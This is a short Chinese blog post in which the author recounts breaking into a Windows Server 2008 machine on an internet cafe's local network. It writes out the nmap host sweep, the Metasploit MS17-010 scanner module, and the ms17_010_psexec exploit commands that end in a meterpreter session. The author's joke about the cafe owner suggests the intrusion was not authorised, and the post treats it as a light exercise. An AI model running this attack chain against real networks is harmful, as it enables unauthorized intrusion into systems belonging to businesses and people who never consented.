一次小小的内网渗透实战(无后渗透阶段)

时隔这么久,读书也读了,考试也考完了。开始接受别人给我一次实战的任务。

--记一次学习不久的实战,以后看到可能会笑自己

轻喷有问题可以留言给我。谢谢

这次选在了离我家比较近的网吧。

每次上网完回家身上都是一股烟味,点比较烦。所以才会想来这里。

让我们开始吧

1、渗透环境配置

需要材料有:

                 pentestbox

2、存活ip寻找。

nmap -sP 192.168.0.0/24

一次小小的内网渗透实战(无后渗透阶段)_第1张图片

看着这些ip是有够烦的。

一次小小的内网渗透实战(无后渗透阶段)_第2张图片


一个个ip看完后

一次小小的内网渗透实战(无后渗透阶段)_第3张图片

192.168.0.250这个ip有点嫌疑。

好家伙是一个服务器系统版本为2008

我们开一下msf看看。

一次小小的内网渗透实战(无后渗透阶段)_第4张图片


我们用一下扫描模块试试

use auxiliary/scanner/smb/smb_ms17_010

一次小小的内网渗透实战(无后渗透阶段)_第5张图片

ohhhhhhhhhh

存在ms17-010

让我们进行下一步操作。

use exploit/windows/smb/ms17_010_psexec

set rhost 192.168.0.250

run

一次小小的内网渗透实战(无后渗透阶段)_第6张图片

开心的run后发现我们获得了一个meterpreter会话。

乱码后我们还是用sysinfo吧。

一次小小的内网渗透实战(无后渗透阶段)_第7张图片

至此,一次考验自己的小小测试到此结束。还是个服务器。


                                                                                                                                       不忘初心,方能始终。 

我是joeboom我们下次再见(不知道什么时候)希望不会被网吧老板打死。

你可能感兴趣的:(一次小小的内网渗透实战(无后渗透阶段))